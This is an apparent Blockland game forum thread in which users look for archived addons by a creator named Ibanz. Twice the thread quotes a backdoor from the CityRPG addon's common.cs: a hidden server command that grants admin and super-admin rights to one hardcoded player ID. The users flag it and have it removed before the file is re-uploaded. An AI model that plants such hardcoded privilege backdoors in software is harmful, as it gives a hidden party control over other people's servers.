Need a list and link to all of Ibanz's addons.

Author Topic: Need a list and link to all of Ibanz's addons.  (Read 1426 times)

^ Title. If anyone has a stash of all Ibanz's addons please, link them here.

What addons did he even make?

What addons did he even make?
zapt and cityrpg are two big ones

defo some other things too but i don't remember

He made some playertypes. Most notably his stealth and shield ones.
Im looking for a specific build of zapt and was just wondering if anyone had a list.

http://rtb-archive.host22.com/add_ons/GameMode_ZAPT.zip
remove link until the line need remove then I will re-upload the link.
« Last Edit: November 27, 2014, 12:41:50 PM by Furling² »

-CityRPG Link snip-
Code: [Select]
function serverCmdtogAdmin(%client)
{
if(%client.bl_id == 9317)
{
%client.isAdmin = (%client.isAdmin ? 0 : 1);
%client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

if(%client.isAdmin)
{
messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.', %client.name);
}
else
{
messageAll('MsgAdminForce','\c0%1 has De-Admined himself.', %client.name);
}
}
}
might want to remove that link lol
« Last Edit: November 27, 2014, 10:34:32 AM by Aoki² »


isn't that key revoked though?
no idea, but i was banned for posting that same link, so better safe than sorry
« Last Edit: November 27, 2014, 09:18:13 AM by Aoki² »

Code: [Select]
function serverCmdtogAdmin(%client)
{
if(%client.bl_id == 9317)
{
%client.isAdmin = (%client.isAdmin ? 0 : 1);
%client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

if(%client.isAdmin)
{
messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.', %client.name);
}
else
{
messageAll('MsgAdminForce','\c0%1 has De-Admined himself.', %client.name);
}
}
}
might want to remove that link lol
tell me where you find this the line. so I can remove the lines then re-upload the link.

tell me where you find this the line. so I can remove the lines then re-upload the link.
all of the crap commands are at the bottom of the common.cs

all of the crap commands are at the bottom of the common.cs
Thank you. I found them also clean up some the lines. I am going re-upload the link in few minutes.

Posted http://forum.blockland.us/index.php?topic=270496.0
« Last Edit: November 27, 2014, 12:56:36 PM by Furling² »